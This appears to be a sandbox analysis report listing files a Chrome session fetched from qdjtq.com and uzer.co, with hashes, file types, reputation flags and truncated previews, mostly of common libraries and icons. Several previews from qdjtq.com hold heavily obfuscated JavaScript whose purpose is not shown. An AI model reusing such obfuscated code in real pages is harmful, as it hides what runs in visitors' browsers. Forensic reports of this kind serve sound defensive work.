            SSDEEP:48:vgMybvnHAvt7mPe8owFI3POSD7Vgp4oGw+4ofaMCtdjIjBKd:Ifbg17mPehkI2i7GJGwisZwKd
            MD5:92BE093537DD15B25ED0058AABD57BAB
            SHA1:41268CA46F9FD5499BEEDEDDC1534E63D0C07104
            SHA-256:6AD1580CEB67009496F923F1897EF2216CC7AFD49ACB160B4F40747739B137D1
            SHA-512:056F6E76A701F7F377A88A1DD48100FD0BE35B3C7DB4257E5475A1E0EBAE0FE4DE2D982D51010AB178206CDF6F8B428831A27047D9FDA21D5BAA6CAFA09CF56F
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/c27b6911ajMSD.js
            Preview:(function(_0x68b6b,_0x3b34b4){const _0x3eaf85=a28_0x3174,_0x3627d1=_0x68b6b();while(!![]){try{const _0xb2a587=-parseInt(_0x3eaf85(0x10d))/0x1*(parseInt(_0x3eaf85(0x107))/0x2)+parseInt(_0x3eaf85(0x105))/0x3+-parseInt(_0x3eaf85(0x109))/0x4+parseInt(_0x3eaf85(0x113))/0x5*(parseInt(_0x3eaf85(0x108))/0x6)+parseInt(_0x3eaf85(0x10e))/0x7+parseInt(_0x3eaf85(0x112))/0x8*(parseInt(_0x3eaf85(0x111))/0x9)+parseInt(_0x3eaf85(0x10f))/0xa*(-parseInt(_0x3eaf85(0x110))/0xb);if(_0xb2a587===_0x3b34b4)break;else _0x3627d1['push'](_0x3627d1['shift']());}catch(_0x503eff){_0x3627d1['push'](_0x3627d1['shift']());}}}(a28_0x4da1,0xc7f02));function a28_0x3174(_0x56cb5e,_0xb5b786){const _0x360a6e=a28_0x4da1();return a28_0x3174=function(_0x2a40eb,_0x5b97c6){_0x2a40eb=_0x2a40eb-0x104;let _0x4da159=_0x360a6e[_0x2a40eb];return _0x4da159;},a28_0x3174(_0x56cb5e,_0xb5b786);}const a28_0x5b97c6=(function(){let _0x4d05a5=!![];return function(_0x5946d0,_0x3623de){const _0x4ab86d=_0x4d05a5?function(){if(_0x3623de){const _0x4
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):7554
            Entropy (8bit):4.25286042320199
            Encrypted:false
            SSDEEP:96:qr2/y973KnJhS88DzdDEKNbDjRhLuKXjvZyHgfOGuyZggO1/LyMzfFg:zqKnJwdDbNHNhLlyHgfDuy5O1DzO
            MD5:4821E2548D62B3D5471964A2C64E2C7F
            SHA1:0D44C292A43018684455C13091101EB4EED81064
            SHA-256:0DAFA4836AE2BEDCAF30433F83A1D551EC66B3E692DB8FB83F764A7DD30231DA
            SHA-512:3BDE4C7A827B8B19EF97D3B7657ABA79D511A65EE01AD2893F11BB513C332FA1596E8DBA66B2B077F7D50376033045E1140E61FCC16B1EA95FCBB524842D35AC
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 28</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-834.000000, -126.000000)">. <g id="Group-28" transform="translate(834.000000, 126.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-8" transform="translate(0.000000, 6.893769)">. <path d="M14.2376106,11.6381261 L9.14128659,11.6381261 L8.58764087,9.4279342 L14.965222,9.4279342 L14.2376106,11.6381261 Z M15.8737577,8.77688002 C15.795908,8.66902335 15.6710877,8.5990035 15.5380039,8.5990035 L8.5084865,8.5990035 C8.46543,8.5990035 8.42454807,8.6137903 8.38497088,8.62596767 L8.18186597,7.81095396 C8.13
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:downloaded
            Size (bytes):503862
            Entropy (8bit):5.245981135808853
            Encrypted:false
            SSDEEP:12288:lV+SQs7Wef1mLdQTqlwTalq+lrjzGc12diaqW9e3SqsHEEvwrKq09FZxM9L+Tomh:TV1mLdQKr2dzSl4xskh
            MD5:D4919984F18EA29434D1C2E4648F2A66
            SHA1:3490D92405665D1E2F2011E7DE7A2DA5355774F6
            SHA-256:71A8E1816B74206F7B646A864DF562AB9E15125939D076273203FE9446D38AE8
            SHA-512:AC6A6BF0250E01A9476935BE25E4FFB9649E06C9A4DFF12CE7C299B53E47BF2103C118B7CDC669C52DE8FDEEAD29A594200050043FE5A2A8F559338ADCDE884A
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/index-7c1edef8.js
            Preview:var a38_0x39acfc=a38_0x2163;(function(_0x3f6a27,_0x3f3530){var _0xdf64b4=a38_0x2163,_0x480821=_0x3f6a27();while(!![]){try{var _0x4971d8=-parseInt(_0xdf64b4(0x1b0))/0x1+parseInt(_0xdf64b4(0x6c2))/0x2+parseInt(_0xdf64b4(0x4ca))/0x3*(-parseInt(_0xdf64b4(0x298))/0x4)+parseInt(_0xdf64b4(0x1d7))/0x5+parseInt(_0xdf64b4(0x1cf))/0x6+parseInt(_0xdf64b4(0x761))/0x7*(parseInt(_0xdf64b4(0x768))/0x8)+parseInt(_0xdf64b4(0x63e))/0x9;if(_0x4971d8===_0x3f3530)break;else _0x480821['push'](_0x480821['shift']());}catch(_0x1a533a){_0x480821['push'](_0x480821['shift']());}}}(a38_0x3be6,0x225bb));function Px(){var _0xeaf1bd=a38_0x2163;import.meta[_0xeaf1bd(0x2fa)],import('_')[_0xeaf1bd(0x387)](()=>0x1);async function*_0x3d95b8(){}}(function(){var _0x32db3c=a38_0x2163,_0xcd12cb=(function(){var _0x1b4925=!![];return function(_0x154766,_0x5c4c92){var _0x535691=_0x1b4925?function(){var _0x5daaa6=a38_0x2163;if(_0x5c4c92){var _0x1573a8=_0x5c4c92[_0x5daaa6(0x593)](_0x154766,arguments);return _0x5c4c92=null,_0x1573a8
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (65327)
            Category:downloaded
            Size (bytes):70475
            Entropy (8bit):5.380996746038723
            Encrypted:false
            SSDEEP:1536:ZKblURHpp4V2JLxcbvM/9mU7C7Az6v0j861:ZmlgJpEvM/9D9z6cI61
            MD5:48BB5C8A01043ECEAF45E65D5C98950B
            SHA1:4603360883DD66F7254CD5DB17777748226DC657
            SHA-256:77080938572095BDDC311784E1C284E7CD12268F46946AFF94D04A43A53DFFC9
            SHA-512:3A03DD060953E790E8ECB40DBE64F2CE4980DAE93433209C40C56910231663660306FE5FCD3D8D3041CC2BAECACA1E3DB1E5C27C39B1A23381D633CA432992DD
            Malicious:false
            Reputation:low
            URL:https://js.hscollectedforms.net/collectedforms.js
            Preview:/*! For license information please see project.js.LICENSE.txt */.!function(){"use strict";var t={}.toString,e=function(e){return t.call(e).slice(8,-1)},r=Array.isArray||function(t){return"Array"==e(t)},n=function(t){return"object"==typeof t?null!==t:"function"==typeof t},i=function(t){if(null==t)throw TypeError("Can't call method on "+t);return t},o=function(t){return Object(i(t))},s=Math.ceil,a=Math.floor,u=function(t){return isNaN(t=+t)?0:(t>0?a:s)(t)},c=Math.min,l=function(t){return t>0?c(u(t),9007199254740991):0},f=function(t,e){if(!n(t))return t;var r,i;if(e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;if("function"==typeof(r=t.valueOf)&&!n(i=r.call(t)))return i;if(!e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;throw TypeError("Can't convert object to primitive value")},d=function(t){try{return!!t()}catch(t){return!0}},h=!d((function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a})),p="object"==typeof window&&window&&window.Ma
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65447)
            Category:downloaded
            Size (bytes):89501
            Entropy (8bit):5.289893677458563
            Encrypted:false
            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
            Malicious:false
            Reputation:low
            URL:https://code.jquery.com/jquery-3.6.0.min.js
            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (1917), with no line terminators
            Category:dropped
            Size (bytes):1917
            Entropy (8bit):5.335902925144818
            Encrypted:false
            SSDEEP:48:vgMybvnHAvt7mPe8owFI3POSD7Vgp4oGw+4ofaMCtdjIjBKd:Ifbg17mPehkI2i7GJGwisZwKd
            MD5:92BE093537DD15B25ED0058AABD57BAB
            SHA1:41268CA46F9FD5499BEEDEDDC1534E63D0C07104
            SHA-256:6AD1580CEB67009496F923F1897EF2216CC7AFD49ACB160B4F40747739B137D1
            SHA-512:056F6E76A701F7F377A88A1DD48100FD0BE35B3C7DB4257E5475A1E0EBAE0FE4DE2D982D51010AB178206CDF6F8B428831A27047D9FDA21D5BAA6CAFA09CF56F
            Malicious:false
            Reputation:low
            Preview:(function(_0x68b6b,_0x3b34b4){const _0x3eaf85=a28_0x3174,_0x3627d1=_0x68b6b();while(!![]){try{const _0xb2a587=-parseInt(_0x3eaf85(0x10d))/0x1*(parseInt(_0x3eaf85(0x107))/0x2)+parseInt(_0x3eaf85(0x105))/0x3+-parseInt(_0x3eaf85(0x109))/0x4+parseInt(_0x3eaf85(0x113))/0x5*(parseInt(_0x3eaf85(0x108))/0x6)+parseInt(_0x3eaf85(0x10e))/0x7+parseInt(_0x3eaf85(0x112))/0x8*(parseInt(_0x3eaf85(0x111))/0x9)+parseInt(_0x3eaf85(0x10f))/0xa*(-parseInt(_0x3eaf85(0x110))/0xb);if(_0xb2a587===_0x3b34b4)break;else _0x3627d1['push'](_0x3627d1['shift']());}catch(_0x503eff){_0x3627d1['push'](_0x3627d1['shift']());}}}(a28_0x4da1,0xc7f02));function a28_0x3174(_0x56cb5e,_0xb5b786){const _0x360a6e=a28_0x4da1();return a28_0x3174=function(_0x2a40eb,_0x5b97c6){_0x2a40eb=_0x2a40eb-0x104;let _0x4da159=_0x360a6e[_0x2a40eb];return _0x4da159;},a28_0x3174(_0x56cb5e,_0xb5b786);}const a28_0x5b97c6=(function(){let _0x4d05a5=!![];return function(_0x5946d0,_0x3623de){const _0x4ab86d=_0x4d05a5?function(){if(_0x3623de){const _0x4
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:downloaded
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muZBc&sid=cjtByYZSYtIZzkm5AHts
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1244
            Entropy (8bit):4.933997063970417
            Encrypted:false
            SSDEEP:24:zAMoOlMkQDlG3SJRWp6sYrCACNiZc8vi3MMBvii6CpmmwArsiiSH2/i3MM/Aiihi:kMoOaFD71zCNiWuicUiiecsiiIuicBi9
            MD5:4B54CFF7858D18604B8F05B2687EB932
            SHA1:ABF566D40867B6D178389E360B39FBE4611D18F9
            SHA-256:B62302BBA0CF7BE5EABB0F5934625BA8FD0212D2C81DD3F4DA577F6CD1638B27
            SHA-512:EB597EEC2AFF93EF81A674152E953ED47202CFAA4DDD63D5EF384676A77699CCEE4A58E605F1C272D1CC5397E1F66AB178DAAB06E8C514557BC050777928D260
            Malicious:false
            Reputation:low
            Preview:jQuery(document).ready(function($) {.....var stickyOffset = $('.main-menu').offset().top;....$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});........ var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 991) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.sub-menu-container').addClass('collapse');.... } else if (ww >= 990) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.submenu-collapse').addClass('show');.. $('.first-lvl').removeClass('collapsed');... $('.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1101
            Entropy (8bit):4.851720620025946
            Encrypted:false
            SSDEEP:12:TMHd4lniOaYxJNTb/lR2kvJ/D4n3rTMwMlLSA3A37bLVYyV+qwuqpJFIFMoW5mqL:2dUnjTxJNJRwTMwtF+3ueua5mq928DY2
            MD5:B986C13F9976E2CE0FCBB3C0F54DBA5B
            SHA1:E95575D872662C3A2C9474A4CCDABA59F27CD755
            SHA-256:9D6418C154873B4D8B682F6ED4E6CE94EED2099C9DE5CB8F2949C86518ADD60A
            SHA-512:CB32283BADCAA508771186C8946A407FE27EC1DE762CEB5A992C813158D01FE50D8CAD3543D39450535559F9263FE038D9E38864B531ED7855A5102C78553D04
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/68.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="linkedin">.. <path d="M11.5 0C17.8516 0 23 5.14912 23 11.5C23 17.851 17.8516 23 11.5 23C5.14833 23 0 17.8509 0 11.5C0 5.1492 5.14841 0 11.5 0Z" id="Path" fill="#0E76A8" fill-rule="evenodd" stroke="none" />.. <path d="M0.0115269 10.051L2.16492 10.051L2.16492 2.87351L0.0115269 2.87351L0.0115269 10.051ZM8.40081 2.62489C7.35573 2.62489 6.42063 3.00654 5.75728 3.84895L5.75728 2.8499L3.59599 2.8499L3.59599 10.051L5.75728 10.051L5.75728 6.15686C5.75728 5.33387 6.51127 4.53101 7.45568 4.53101C8.4001 4.53101 8.633 5.33387 8.633 6.13672L8.633 10.0503L10.7864 10.0503L10.7864 5.97645C10.7863 3.14668 9.4466 2.62489 8.40081 2.62489ZM1.07816 2.15624C1.67329 2.15624 2.15632 1.67321 2.15632 1.07808C2.15632 0.482945 1.67329 0 1.07816 0C0.483024 0 0 0.483024 0 1.07816C0 1.67329 0.483024 2.15624 1.07816 2.15
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (5064), with no line terminators
            Category:dropped
            Size (bytes):5064
            Entropy (8bit):5.907586906009636
            Encrypted:false
            SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRU2E2AagXP4vtk:1DY0hf1bT47OIqWb1q2Aacetk
            MD5:FD3AB2A17776B90A05A5CD1DD2A18432
            SHA1:4E035C446A33399DEC739CDB66967053038D6682
            SHA-256:CCAC2A90839793A172614E1A2DB883E10D4621C927947626C2130B0FC4F78D28
            SHA-512:98B15A35C75EEF572996103C57AEAFF322692C2E3ED353C262620DD5CE3795F70AE2CB0640538BAF19719EA1958EBE47EC8824442240460D660E08BF1166F70F
            Malicious:false
            Reputation:low
            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):2527
            Entropy (8bit):5.068922371074269
            Encrypted:false
            SSDEEP:48:kMl7nTwtiPndg2TfqaeLI2TVLTsKLT8WNbsKLT8WNbYgVRroc2W7sAcKLW7sAcTw:Tgr2QI2h3Fp2W7sAceW7sAcTw
            MD5:90A1496914AF0F61B9CACA5810998153
            SHA1:277DD0FCE96EC533616DC1BCC47D55D979D1B6CF
            SHA-256:3EE12BCCA313408B091F15F185CD65EEC951CBC32DB6835BD7ED5716139E154E
            SHA-512:2B0C2192CC18D7CF4111808F6BA2F6ED5279D5F8CB85F1C665A37E78D0E3B0D694037F177BA0F59412D6067DDE4A1F93C2FFDA9AD9EC260F22542AE77046F034
            Malicious:false
            Reputation:low
            Preview:jQuery(document).ready(function($){...var overlayNav = $('.cd-overlay-nav'),....overlayContent = $('.cd-overlay-content'),....navigation = $('.cd-primary-nav'),....toggleNav = $('.cd-nav-trigger'),....bodyclass = $('body');........//inizialize navigation and content layers...layerInit();...$(window).on('resize', function(){....window.requestAnimationFrame(layerInit);...});.....//open/close the menu and cover layers...toggleNav.on('click', function(){....if(!toggleNav.hasClass('close-nav')) {.....//it means navigation is not visible yet - open it and animate navigation layer.....toggleNav.addClass('close-nav');.....bodyclass.addClass('opened');..........overlayNav.children('span').velocity({......translateZ: 0,......scaleX: 1,......scaleY: 1,.....}, 500, 'easeOutSine', function(){......navigation.addClass('fade-in');.....});....} else {.....//navigation is open - close it and remove navigation layer.....toggleNav.removeClass('close-nav');.....bodyclass.removeClass('opened');..........ov
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65450)
            Category:downloaded
            Size (bytes):179505
            Entropy (8bit):5.345680402541107
            Encrypted:false
            SSDEEP:1536:8wmvBwvwCPMwe57D1pTT5OFm7eTX423SDyDbGw5frPSfFse84qay:0BwvwCPMwa1LOFw/KEFsb9j
            MD5:1A45E8BDC48B1DE739300593DD8472C8
            SHA1:A6A316B2AABABC6D8D8BF4B59FFCD4039452D007
            SHA-256:9DCAE18A6EE245C6BBAAAD67D267FD00D43FE95598817484CF00A17A00A9CDB5
            SHA-512:A4DB401FE21EBDC80F3F0A9EFDA05C9FA394659329F52BD921F06009E3192C83BB4A34D96E4BFD15010E0009DCCD6328C1AA36497AFFC48733781A7FAE130E7A
            Malicious:false
            Reputation:low
            URL:https://script.hotjar.com/modules.0721e7cf944cf9d78a0b.js
            Preview:/*! For license information please see modules.0721e7cf944cf9d78a0b.js.LICENSE.txt */.!function(){var e={4788:function(e,t,n){"use strict";n.d(t,{s:function(){return r}});const r=Object.freeze({IDENTIFY_USER:"identify_user",AUTOTAG_RECORDING:"autotag_recording",TAG_RECORDING:"tag_recording",HEATMAP_HELO:"heatmap_helo",RECORDING_HELO:"recording_helo",REPORT_USER_ID:"report_user_id",MUTATION:"mutation",MOUSE_CLICK:"mouse_click",INPUT_CHOICE_CHANGE:"input_choice_change",KEY_PRESS:"key_press",MOUSE_MOVE:"mouse_move",RELATIVE_MOUSE_MOVE:"relative_mouse_move",CLIPBOARD:"clipboard",PAGE_VISIBILITY:"page_visibility",SCROLL_REACH:"scroll_reach",SCROLL:"scroll",SELECT_CHANGE:"select_change",VIEWPORT_RESIZE:"viewport_resize",SCRIPT_PERFORMANCE:"script_performance",REPORT_CONTENT:"report_content",INSERTED_RULE:"inserted_rule",DELETED_RULE:"deleted_rule"})},6939:function(e,t,n){"use strict";n.d(t,{f:function(){return f},W:function(){return g}});const r=Object.freeze({LIVE:"LIVE",REVIEW_WEBAPP:"REVI
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):2527
            Entropy (8bit):5.068922371074269
            Encrypted:false
            SSDEEP:48:kMl7nTwtiPndg2TfqaeLI2TVLTsKLT8WNbsKLT8WNbYgVRroc2W7sAcKLW7sAcTw:Tgr2QI2h3Fp2W7sAceW7sAcTw
            MD5:90A1496914AF0F61B9CACA5810998153
            SHA1:277DD0FCE96EC533616DC1BCC47D55D979D1B6CF
            SHA-256:3EE12BCCA313408B091F15F185CD65EEC951CBC32DB6835BD7ED5716139E154E
            SHA-512:2B0C2192CC18D7CF4111808F6BA2F6ED5279D5F8CB85F1C665A37E78D0E3B0D694037F177BA0F59412D6067DDE4A1F93C2FFDA9AD9EC260F22542AE77046F034
            Malicious:false
            Reputation:low
            URL:https://uzer.co/js/expandable.js
            Preview:jQuery(document).ready(function($){...var overlayNav = $('.cd-overlay-nav'),....overlayContent = $('.cd-overlay-content'),....navigation = $('.cd-primary-nav'),....toggleNav = $('.cd-nav-trigger'),....bodyclass = $('body');........//inizialize navigation and content layers...layerInit();...$(window).on('resize', function(){....window.requestAnimationFrame(layerInit);...});.....//open/close the menu and cover layers...toggleNav.on('click', function(){....if(!toggleNav.hasClass('close-nav')) {.....//it means navigation is not visible yet - open it and animate navigation layer.....toggleNav.addClass('close-nav');.....bodyclass.addClass('opened');..........overlayNav.children('span').velocity({......translateZ: 0,......scaleX: 1,......scaleY: 1,.....}, 500, 'easeOutSine', function(){......navigation.addClass('fade-in');.....});....} else {.....//navigation is open - close it and remove navigation layer.....toggleNav.removeClass('close-nav');.....bodyclass.removeClass('opened');..........ov
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 600 x 360, 8-bit colormap, non-interlaced
            Category:dropped
            Size (bytes):8664
            Entropy (8bit):7.926215771184888
            Encrypted:false
            SSDEEP:192:Ido6HtBkCpSuMFY5b77xB5yPSBviM+1fOpGYHNBjWiOH1:mQCr7xryP+qFw1O
            MD5:BD6657FF14B9D89DECDC542F685E3C52
            SHA1:70DFE451D4B11E31CFFF428615028551399CC744
            SHA-256:861F3D84D4C0BFC46E4D0A99889AA1C534C5E237AEB357E18D9C5B46556D1EE7
            SHA-512:6EF4E5ECFD3A6A7402215134AB6CF40F4E3AC57C0B71B76BF57FEAE24A67ED1F41A523B9514DF4FD8DDEFD101D615BD03C7BD287FCE97960B5BDB495FE30A8B1
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR...X...h......*u.....PLTE.......D..z...{..............wt....```...YW`......\Z`...Ty....hfp......^]`...;:@...ppp...wu....JIP.........w...........@@@...;I....PPP...@N.=<@......JHP...NMP 1.....!...........3......9Y....k...........,N.F.J..@....3...[Y`.......,.......ooo..N....1.1.. ...%.....Z......;[.....;........Rm.Fc.......$<....j..o...Xd...t..`y........u~.IV....`.._x.Wr.......}....=...............f...gq.,;s.:p..lSm........?....Kk..L..B.......s......@..R......&.P]..L..&...d@O`?BP..4 !'.........p{...p@AG8.;Ig..r..8.....c......nmp..k0?P /@,/>..1..-....J.......k..\...../`.0O.2G.a....>W....h..T... .....D....PT`....Y.j..^.....je.......R.. .4K..=.`ah].cSX`//0......xF.$....cn.~x.AJ~ /|t.|_ho >` +]Q.VP..1f.......D_.....`.`l..>.:..yF}.,|LTpi.o..( ....IDATx...1..0..0..|......1..$.6i...............................o..N.a.....I#..d.P..4.K......(Tpr+..J..?..su..zr.pK....z8.......M.\b.^.4g{Iy>K.?./}R..B.!...<..,."w...P....S.N.|.2..X.8,..%EaQX.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):135
            Entropy (8bit):4.889758352890162
            Encrypted:false
            SSDEEP:3:YVKBEi5U34WIRL2KIhfwcP2xR2GXEqRWJ6jLZHJqbTjcB:YiXUIWIbU2mn6jLZpcO
            MD5:0DDE4E863FFF7591AD217E226FF903DC
            SHA1:3C56AD7A38C669482FFB6F279BCA70BB689436AF
            SHA-256:ADC5FC99F6C55671C1AD4C765156F4441A9FC6568728821C13DEACF29E17EEC2
            SHA-512:ADE53ABC2305B1AD978D42A9A17413569F70336A270F3643D24A0768664D930E860357F040283112271DA2E65B5D186340415983BC92002DE2E0583223BB1FA3
            Malicious:false
            Reputation:low
            Preview:{"portalId":22144436,"submissionsApiDomain":"forms.hubspot.com","reportScraperTest":false,"formCaptureEnabled":true,"token":-616979290}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (32038)
            Category:downloaded
            Size (bytes):95992
            Entropy (8bit):5.391333957965341
            Encrypted:false
            SSDEEP:1536:OP10iSi65U/dXXeyhzeBuG+HYE0WEeLDFoNqLTW8+S5VRZIVI6xSb8xh2ZbQnRmm:R+41ZqLTW8xRrqSb8qGH77da98Hr3
            MD5:F03E5A3BF534F4A738BC350631FD05BD
            SHA1:37B1DB88B57438F1072A8EBC7559C909C9D3A682
            SHA-256:AEC3D419D50F05781A96F223E18289AEB52598B5DB39BE82A7B71DC67D6A7947
            SHA-512:8EEEAEFB86CF5F9D09426814F7B60E1805E644CAC3F5AB382C4D393DD0B7AB272C1909A31A57E6D38D5ACF207555F097A64A6DD62F60A97093E97BB184126D2A
            Malicious:false
            Reputation:low
            URL:https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js
            Preview:/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):3857
            Entropy (8bit):4.5794716462664375
            Encrypted:false
            SSDEEP:96:xH/UhQQqOcGPFVAduL8UY/2rBHxY7XcXyicxAthTD+65w:tRgJFY/2rBxYTmyGCb
            MD5:DA43438BED46DFC10A9800655577228D
            SHA1:65EB7A45B4B0A62E53970EAC81096A275C5C4D70
